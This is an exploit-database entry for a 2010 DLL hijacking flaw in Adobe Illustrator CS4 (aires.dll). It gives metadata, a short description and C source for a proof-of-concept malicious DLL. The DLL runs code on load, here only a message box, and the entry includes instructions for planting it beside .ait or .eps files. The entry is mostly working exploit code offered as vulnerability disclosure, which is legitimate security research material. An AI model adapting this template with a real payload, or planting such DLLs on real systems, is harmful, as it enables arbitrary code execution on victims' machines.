Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll)

vendor:

Adobe Illustrator

by:

Glafkos Charalambous

5.5

CVSS

MEDIUM

DLL Hijacking

427

CWE

Product Name: Adobe Illustrator

Affected Version From: CS4 v14.0.0

Affected Version To: CS4 v14.0.0

Patch Exists: NO

Related CWE:

CPE: a:adobe:illustrator:cs4:14.0.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64 Ultimate

2010

Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll)

This exploit targets Adobe Illustrator CS4 version 14.0.0 by hijacking the aires.dll file. When the DLL is loaded, it displays a message box with the text 'Adobe DLL Hijacking!'

Mitigation:

Update to a patched version of Adobe Illustrator CS4.

Source

Exploit-DB raw data:

/* 
Exploit Title: Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 v14.0.0
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .ait .eps
Greetz: Astalavista, OffSEC, Exploit-DB
Note: Create folders system\enu_us and put aires.dll
*/

#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		dll_hijack();
	case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
}

int dll_hijack()
{
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}